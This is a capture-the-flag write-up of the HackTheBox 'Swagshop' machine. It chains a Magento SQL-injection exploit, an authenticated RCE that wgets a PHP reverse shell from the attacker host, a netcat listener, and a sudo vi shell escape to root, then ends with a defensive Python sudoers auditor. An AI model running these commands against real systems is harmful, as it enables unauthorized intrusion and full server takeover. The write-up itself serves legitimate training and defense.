OS: Ubuntu 16.04
Swagshop is an easy Linux box on HackTheBox running a vulnerable version of Magento. A Python exploit uses a SQL injection to create an admin account. With that admin account, a second Python exploit gives authenticated remote code execution, which is used to download a shell to the webroot. After triggering the reverse shell, loose restrictions in sudo allow www-data to run vi on files in /var/www/html as root with no password. Escaping vi with a classic shell escape provides a shell as root.
Enumeration starts with a quick nmap scan. This reveals two open ports, 22 and 80.
command: nmap -sC -sV 10.10.10.140
Visiting port 80 reveals a Magento page.
Magento version enumeration is done by visiting RELEASE_NOTES.txt.
The first exploit used creates an admin user on the Magento web application through a SQL injection.
command: searchsploit magento
Mirroring the exploit to the working directory.
command: searchsploit -m exploits/xml/webapps/37877.py
For the exploit to work, remove all uncommented text. The target IP has to be added to the exploit, and the path has to be altered, as it is incorrect.
Set the new admin username and password to anything you'd like. I chose the username and password newadmin:hacker
Running the modified exploit.
command: python magentoexploit.py
Logging in as 'newadmin' to confirm that we have created a valid admin user.
Remote Code Execution Exploit
Finding an Authenticated Remote Code Execution Exploit.
Mirroring the exploit to current directory.
The exploit requires the exact date and time of the installation. This information can be found at /app/etc/local.xml
This exploit requires that a username and password are defined. Change the install_date variable to match the value in local.xml. The manual username prompt also prevents the exploit from running successfully, so it must be changed as well.
Running the exploit. Executing whoami and pwd.
command: python authenticatedrec.py http://10.10.10.140/index.php/admin/ "whoami"
command: python authenticatedrec.py http://10.10.10.140/index.php/admin/ "pwd"
Downloading a reverse shell to /var/www/html allows the PHP to execute when it is triggered through a web browser. Start Python's SimpleHTTPServer to serve the Pentest Monkey reverse shell. Don't forget to change the IP and port variables to reflect the attacker's listener information.
command: python -m SimpleHTTPServer 80
Downloading the reverse shell with the exploit's remote code execution.
command: python authenticatedrec.py http://10.10.10.140/index.php/admin/ "wget http://10.10.14.20/revsh.php"
Starting a netcat listener:
command: nc -lvnp 443
Triggering the reverse shell.
Catching the reverse shell as user www-data.
First things first, upgrade to a TTY with python3. Python 2 is not on this system, but python3 is.
command: python3 -c "import pty; pty.spawn('/bin/bash')"
It appears www-data can run /usr/bin/vi on any file in the /var/www/html directory as root without a password.
command: sudo -l
Running the following command will start vi as root. Using vi we can execute any bash command by prepending the command with ':!'.
command: sudo vi /var/www/html/anyfile
The shell escape sequence:
command: :! /bin/bash
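The sudo rule abused above is the misconfiguration a defender should catch during review. The script below is an added example, not part of this writeup, that parses sudoers-style user specifications and flags rules which let a user run a shell-escaping editor as root; the sample rules are constructed to mirror the www-data rule on this box, alongside a sudoedit variant (which runs the editor unprivileged and only copies the file back as root) that is not flagged.

```python
import re

# Editors that offer an interactive shell escape when run with elevated rights
# (the page's case is /usr/bin/vi; the rest are the usual vi family).
SHELL_ESCAPE_EDITORS = {"vi", "vim", "view", "vim.basic", "vim.tiny"}

# Constructed sudoers lines mirroring the rule described above; not the target's file.
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/bin/vi /var/www/html/*
www-data ALL=(root) NOPASSWD: sudoedit /var/www/html/index.php
"""

# Simplified user-spec grammar: user host=(runas) TAG: cmd, cmd
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def parse_rule(line):
    """Parse one user specification; None for blank, comment or Defaults lines."""
    line = line.strip()
    if not line or line.startswith(("#", "Defaults")):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    return {
        "user": m.group("user"),
        "runas": (m.group("runas") or "root").split(":")[0],
        "tags": {t.strip() for t in m.group("tags").split(":") if t.strip()},
        "commands": [c.strip() for c in m.group("cmds").split(",")],
    }

def audit_sudoers(text):
    """Flag rules that let a user run a shell-escaping editor as root."""
    findings = []
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule is None or rule["runas"] not in ("root", "ALL"):
            continue
        for cmd in rule["commands"]:
            if cmd.split()[0].rsplit("/", 1)[-1] not in SHELL_ESCAPE_EDITORS:
                continue
            reasons = ["editor with ':!' shell escape runs as root"]
            if "NOPASSWD" in rule["tags"]:
                reasons.append("no password required")
            if "*" in cmd:  # wildcard lets the user pick any matching file
                reasons.append("wildcard path argument")
            findings.append({"user": rule["user"], "command": cmd, "reasons": reasons})
    return findings
```

Running `audit_sudoers(SAMPLE_SUDOERS)` reports only the vi rule, with all three reasons; the sudoedit rule passes.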